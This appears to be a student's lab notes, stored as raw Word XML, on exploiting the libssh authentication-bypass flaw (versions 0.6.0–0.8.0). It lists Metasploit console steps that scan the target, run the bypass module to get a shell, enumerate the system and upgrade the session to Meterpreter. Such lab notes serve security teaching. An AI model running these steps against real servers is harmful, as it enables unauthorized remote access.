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3CD4" w14:textId="221DC9C8" w:rsidR="00853ABF" w:rsidRPr="007C6E2B" w:rsidRDefault="00641712">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting A Vulnerable SSH Server</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9FD17" w14:textId="18782E34" w:rsidR="00641712" w:rsidRDefault="008314B4">
      <w:r>
        <w:t>Remote administration protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A91CBF" w14:textId="19D83A08" w:rsidR="008314B4" w:rsidRDefault="008314B4">
      <w:r>
        <w:t>Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC16CF" w14:textId="5238A6A0" w:rsidR="008314B4" w:rsidRDefault="008314B4">
      <w:r>
        <w:t>Successor to telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E606788" w14:textId="4B28BBF2" w:rsidR="008314B4" w:rsidRDefault="008314B4">
      <w:r>
        <w:t>Secure shell= 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAD563" w14:textId="77777777" w:rsidR="008314B4" w:rsidRDefault="008314B4"/>
    <w:p w14:paraId="2D81C926" w14:textId="4E610B9A" w:rsidR="008314B4" w:rsidRDefault="008314B4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008314B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Libssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008314B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00036A09" w:rsidRPr="008314B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiplatform</w:t>
      </w:r>
      <w:r w:rsidRPr="008314B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> c library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> implementing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1860">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSHv2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> protocol on client and server side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA1D900" w14:textId="77777777" w:rsidR="008314B4" w:rsidRDefault="008314B4"/>
    <w:p w14:paraId="58CEFA58" w14:textId="517B5AAE" w:rsidR="008314B4" w:rsidRDefault="008314B4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008314B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Libssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v0.6.0 to 0.8.0 is vuln to </w:t>
      </w:r>
      <w:r w:rsidRPr="008314B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authentication bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server code, that can be exploited </w:t>
      </w:r>
      <w:r w:rsidR="00CB1860">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> execute command </w:t>
      </w:r>
      <w:r w:rsidR="00CB1860">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>n the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED1A663" w14:textId="77777777" w:rsidR="008314B4" w:rsidRDefault="008314B4"/>
    <w:p w14:paraId="700E6E81" w14:textId="479BDA8E" w:rsidR="00CB1860" w:rsidRPr="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790F335E" w14:textId="77777777" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B"/>
    <w:p w14:paraId="2FA18844" w14:textId="368DF747" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B166727" w14:textId="2B0E08BA" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B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22227AAB" w14:textId="5A323491" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D2D677" w14:textId="30F1274A" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t>Workspace -a ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC30F39" w14:textId="5DFBD198" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B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66ED0476" w14:textId="6C7FB519" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t xml:space="preserve">Workspace </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C319318" w14:textId="253659D1" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46D072AF" w14:textId="5A8254FC" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> help run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and safe result in database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75105A07" w14:textId="77777777" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B"/>
    <w:p w14:paraId="58D772F7" w14:textId="55032787" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t xml:space="preserve">Services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875A928" w14:textId="16BB8899" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B"/>
    <w:p w14:paraId="071EC405" w14:textId="6FCD0DBF" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libssh_auth_bypass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25D38F6E" w14:textId="4ED8380C" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t># to check is it is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96ABA5" w14:textId="0D6162BA" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36918260" w14:textId="7291852C" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B70A29" w14:textId="2AE0121F" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t>Set SPAWN_PTY true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097ED5AC" w14:textId="3B646810" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>allow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use to spawn the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22D246" w14:textId="77777777" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B"/>
    <w:p w14:paraId="280334A1" w14:textId="64ACD824" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A018C00" w14:textId="266E9C52" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the cmd session in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012F9C4" w14:textId="635E2308" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68914441" w14:textId="1073AE85" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t>Sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729FB3A1" w14:textId="7A9B333F" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="734C8169" w14:textId="77777777" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B"/>
    <w:p w14:paraId="2C87FBCA" w14:textId="2DC13AF4" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/*release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276F24DF" w14:textId="365604D5" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t># t</w:t>
      </w:r>
      <w:r w:rsidR="00614437">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> see distribution release version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA220EE" w14:textId="77777777" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B"/>
    <w:p w14:paraId="39D63AED" w14:textId="1D7BD4BB" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6805BD0E" w14:textId="27ACF9EA" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B">
      <w:r>
        <w:t>#kernel version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E20DF" w14:textId="77777777" w:rsidR="00614437" w:rsidRDefault="00614437"/>
    <w:p w14:paraId="5768CD0A" w14:textId="4A6E8CA4" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:t>Ctrl+z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBD276D" w14:textId="2298C5A0" w:rsidR="00614437" w:rsidRDefault="0008086D">
      <w:r>
        <w:t xml:space="preserve">#Upgrade command shell to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A89E5" w14:textId="77777777" w:rsidR="0008086D" w:rsidRDefault="0008086D"/>
    <w:p w14:paraId="09786F1F" w14:textId="5AA964E7" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63F37FF8" w14:textId="3DC005A8" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA481C" w14:textId="67C47C16" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76A444" w14:textId="029F0A0C" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:t>Set LHOST eth1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04698D7B" w14:textId="101BE9BF" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:t>Set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424577B8" w14:textId="2B05D328" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24364D" w14:textId="1851EE52" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the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 </w:t>
      </w:r>
      <w:r w:rsidR="000548F0">
        <w:t>created, the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> error comes don’t worry about it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F3485" w14:textId="77777777" w:rsidR="0008086D" w:rsidRDefault="0008086D"/>
    <w:p w14:paraId="0448C55E" w14:textId="6A6243DE" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABF2D3A" w14:textId="44931BDE" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6500A" w14:textId="48520034" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DA51A72" w14:textId="2CD38FF1" w:rsidR="0008086D" w:rsidRDefault="0008086D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11DD10E7" w14:textId="77777777" w:rsidR="0008086D" w:rsidRDefault="0008086D"/>
    <w:p w14:paraId="75D62365" w14:textId="77777777" w:rsidR="007C6E2B" w:rsidRDefault="007C6E2B"/>
    <w:p w14:paraId="49C02EFB" w14:textId="5950A6AA" w:rsidR="007C6E2B" w:rsidRPr="00EF3B06" w:rsidRDefault="00EF3B06">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3B06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BAE338" w14:textId="77777777" w:rsidR="00EF3B06" w:rsidRPr="00EF3B06" w:rsidRDefault="00EF3B06" w:rsidP="00EF3B06">
      <w:r w:rsidRPr="00EF3B06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTY</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:t xml:space="preserve"> stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Teletypewriter</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AB9B12" w14:textId="3B5D4EDF" w:rsidR="00EF3B06" w:rsidRPr="00EF3B06" w:rsidRDefault="00EF3B06" w:rsidP="00EF3B06">
      <w:r w:rsidRPr="00EF3B06">
        <w:t>In simple words:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:t xml:space="preserve"> It originally meant a physical machine used to type and send text over a line.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:t xml:space="preserve"> In modern systems (like Linux), it means a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>command-line session</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B06">
        <w:t xml:space="preserve"> where you interact with the system</w:t>
      </w:r>
      <w:r w:rsidR="00D255D9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C53A6FD" w14:textId="77777777" w:rsidR="00EF3B06" w:rsidRDefault="00EF3B06"/>
    <w:sectPr w:rsidR="00EF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0E"/>
    <w:rsid w:val="00036A09"/>
    <w:rsid w:val="000548F0"/>
    <w:rsid w:val="0008086D"/>
    <w:rsid w:val="002A4387"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00614437"/>
    <w:rsid w:val="00641712"/>
    <w:rsid w:val="007C6E2B"/>
    <w:rsid w:val="008314B4"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="0085790E"/>
    <w:rsid w:val="00CB1860"/>
    <w:rsid w:val="00D255D9"/>
    <w:rsid w:val="00EF3B06"/>
    <w:rsid w:val="00FD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08A8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6648DC19-FB7E-4004-A565-72BB3F41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188</Words>
  <Characters>1171</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>78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21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-08T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-08T15:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>